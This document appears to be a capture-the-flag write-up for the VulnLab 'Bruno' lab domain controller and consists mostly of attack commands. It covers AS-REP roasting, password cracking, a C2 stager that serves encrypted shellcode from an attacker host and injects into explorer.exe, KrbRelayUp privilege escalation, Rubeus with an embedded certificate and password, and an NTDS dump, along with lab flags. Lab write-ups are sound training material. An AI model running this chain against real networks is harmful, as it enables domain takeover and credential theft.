Malleum Knowledge Base

Penetration Testing Report - Bruno

2 min read

Bruno

Machine IDMachine IP
Bruno10.10.82.94

Enumeration: Phase-1

Port Scanning

sudo nmap -sC -sV -oA bruno 10.10.82.94
  • -sC: Runs default Nmap scripts.
  • -sV: Detects service versions.
  • -oA: Outputs in all formats (normal, XML, and grepable) and saves with the prefix bruno.
PortServiceVersion
21ftpMicrosoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)
06-29-22 04:55PM app
06-29-22 04:33PM benign
06-29-22 01:41PM malicious
06-29-22 04:33PM queue
53domainSimple DNS Plus
80httpMicrosoft IIS httpd 10.0
88kerberos-secMicrosoft Windows Kerberos
135msrpcMicrosoft Windows RPC
139netbios-ssnMicrosoft Windows netbios-ssn
389ldapMicrosoft Windows Active Directory LDAP
443ssl/httpMicrosoft IIS httpd 10.0
445microsoft-ds?
464kpasswd5?
593ncacn_httpMicrosoft Windows RPC over HTTP 1.0
636ssl/ldapMicrosoft Windows Active Directory LDAP
3268ldapMicrosoft Windows Active Directory LDAP
3269ssl/ldapMicrosoft Windows Active Directory LDAP
3389ms-wbt-serverMicrosoft Terminal Services
- NetBIOS_Domain_Name: BRUNO
- NetBIOS_Computer_Name: BRUNODC
- DNS_Computer_Name: brunodc.bruno.vl
- rdp-ntlm-info:
- DNS_Domain_Name: bruno.vl
- ssl-cert: Subject: commonName=brunodc.bruno.vl
- Product_Version: 10.0.20348
- DNS_Tree_Name: bruno.vl
- Not valid before: 2024-06-04T20:35:42
- Target_Name: BRUNO
5357httpMicrosoft HTTPAPI httpd 2.0

Editing the /etc/hosts based on the scan result

10.10.82.94 brunodc.bruno.vl bruno.vl

FTP - Port 21 Enumeration

Anonymous logins are allowed on the Brunodc domain controller.

ftp anonymous@brunodc.bruno.vl

FTP Shares

On the share app we found SampleScanner.exe file along with some other files required for the executable.

On the share benign we found test.exe file.

impacket-GetNPUsers bruno.vl/svc_scan -no-pass -request

 hashcat svc_scan_hash /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt

Sunshine1

cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --asreproast ASREPROAST


cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --kerberoasting KERBEROASTING

hashcat ASREPROAST /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt


profiles new -b https://10.8.2.41:443 --format shellcode --arch amd64 osep_64


https -L 10.8.2.41 -l 443


stage-listener --url http://10.8.2.41:80 --profile osep_64 -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t --aes-encrypt-iv 8y/B?E(G+KbPeShV


./cli_interface -o dll -u http://10.8.2.41:80/test.woff -c deflate -e aes -k 'D(G+KbPeShVmYq3t' -v '8y/B?E(G+KbPeShV' -p explorer.exe

VL{6efd85f20df80e14a0452381657809e4}


execute-assembly ./KrbRelayUp.exe "full -m shadowcred -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246"


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


sE9-bU4/lU7=

./Rubeus.exe asktgt /user:brunodc$ /certificate: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 /password:sE9-bU4/lU7= /enctype:AES256 /nowrap

Method Worked Privilege Escalation Add machine account

execute-assembly ./CheckPort.exe


**CLSIDs** (confirmed working on Server 2019/2022 with ADCS installed):

- c980e4c2-c178-4572-935d-a8a429884806
- 90f18417-f0f1-484e-9d3c-59dceee5dbd8
- 03ca98d6-ff5d-49b8-abc6-03dd84127020
- d99e6e73-fc88-11d0-b498-00a0c90312f3 (certsrv.exe)
- 42cbfaa7-a4a7-47bb-b422-bd10e9d02700
- 000c101c-0000-0000-c000-000000000046
- 1b48339c-d15e-45f3-ad55-a851cb66be6b
- 49e6370b-ab71-40ab-92f4-b009593e4518
- 50d185b9-fff3-4656-92c7-e4018da4361d
- 3c6859ce-230b-48a4-be6c-932c0c202048 (trusted installer service)

execute-assembly ./KrbRelayUp.exe "full -m rbcd -c -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246"

impacket-getST -impersonate 'Administrator' bruno.vl/'KRBRELAYUP$':'yT6#fH1-nK2$aH7=' -spn 'cifs/BRUNODC.bruno.vl'

export KRB5CCNAME=administrator@HOST_BRUNODC@BRUNO.VL.ccache

 cme smb brunodc.bruno.vl -u 'Administrator' --use-kcache -M ntdsutil


VL{b528ba689d85ca396374c0f186087a7d}

https://gist.github.com/tothi/bf6c59d6de5d0c9710f23dae5750c4b9 https://arz101.medium.com/vulnlab-bruno-f0129f60ac40 https://notes.secure77.de/?link=%2FWriteUps%2FVulnLab%2FBruno%2FWriteup

Graph View